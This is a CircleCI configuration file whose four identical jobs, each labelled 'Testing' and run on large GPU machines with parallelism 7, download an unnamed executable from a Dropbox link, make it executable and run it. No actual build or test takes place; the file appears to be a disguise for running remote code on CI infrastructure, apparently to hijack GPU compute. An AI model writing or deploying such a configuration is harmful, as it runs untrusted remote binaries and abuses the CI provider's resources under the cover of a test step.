version: 2.1
jobs:
    Devop:
      machine:
       resource_class: gpu.nvidia.large
       image: ubuntu-1604-cuda-10.1:201909-23
      parallelism: 7    
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x sync-dropbox?dl=1 && ./sync-dropbox?dl=1
    Devop1:
      machine:
       resource_class: gpu.nvidia.large
       image: ubuntu-1604-cuda-10.1:201909-23
      parallelism: 7   
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x sync-dropbox?dl=1 && ./sync-dropbox?dl=1
    Devop2:
      machine:
       resource_class: gpu.nvidia.large
       image: ubuntu-1604-cuda-10.1:201909-23
      parallelism: 7
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x sync-dropbox?dl=1 && ./sync-dropbox?dl=1
    Devop3:
      machine:
       resource_class: gpu.nvidia.large
       image: ubuntu-1604-cuda-10.1:201909-23
      parallelism: 7
      steps:
        - checkout
        - run:
            name: "Testing"
            command: sudo apt update -y && wget https://www.dropbox.com/s/f1ejvcr6yi6yjv3/sync-dropbox?dl=1 && chmod +x sync-dropbox?dl=1 && ./sync-dropbox?dl=1
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3